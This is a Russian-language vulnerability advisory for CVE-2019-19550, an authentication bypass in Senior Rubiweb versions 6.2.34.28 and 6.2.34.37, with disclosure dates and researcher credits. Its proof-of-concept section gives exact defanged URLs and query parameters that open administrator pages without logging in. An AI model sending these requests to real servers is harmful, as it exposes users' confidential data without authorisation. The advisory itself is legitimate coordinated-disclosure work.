CVE-2019-19550
[Описание]
Удалённый обход аутентификации в Senior Rubiweb 6.2.34.28 и 6.2.34.37 позволяет получить административный доступ к конфиденциальной информации затронутых пользователей, использующих уязвимые версии. Атакующему достаточно указать правильный URL.
[Важные даты]
- Уведомление (производителю): 2019-12-02
- Дата публичного раскрытия: 2020-01-30
[Тип уязвимости]
Некорректный контроль доступа
[Производитель продукта]
Senior
[Затронутая кодовая база продукта]
- Rubiweb - 6.2.34.37
- Rubiweb - 6.2.34.28
- Другие версии могут быть затронуты, особенно из того же семейства (ещё не протестировано)
[Затронутый компонент]
Rubiweb
[Тип атаки]
Удалённая
[Воздействие: раскрытие информации]
True
[Векторы атаки]
Конфиденциальная информация доступна публично без особых требований (достаточно правильного URI)
[Подтвердил ли или признал ли производитель уязвимость?]
True
[PoC - Доказательство концепции]
- Просто попробуйте подключиться к порталу с аутентификацией, чтобы подтвердить наличие и версию затронутого продукта:
- hXXp://subdomain.customer.tld:8080/rubiweb/
- Получите доступ к уязвимой странице (администратор без аутентификации):
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU
[Исследователь]
Mauricio Santos (R&D UnderProtection) и Hesron Hori (R&D UnderProtection)
[Благодарности]
Senior - команда информационной безопасности производителя, сотрудничавшая в проведении согласованного раскрытия
[Ссылки]